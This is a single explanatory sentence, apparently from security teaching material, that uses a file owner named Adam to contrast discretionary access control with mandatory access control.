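Because the owner of the file (Adam) edits these entries himself, this is discretionary access control; the same list evaluated against labels the owner cannot change would be mandatory access control.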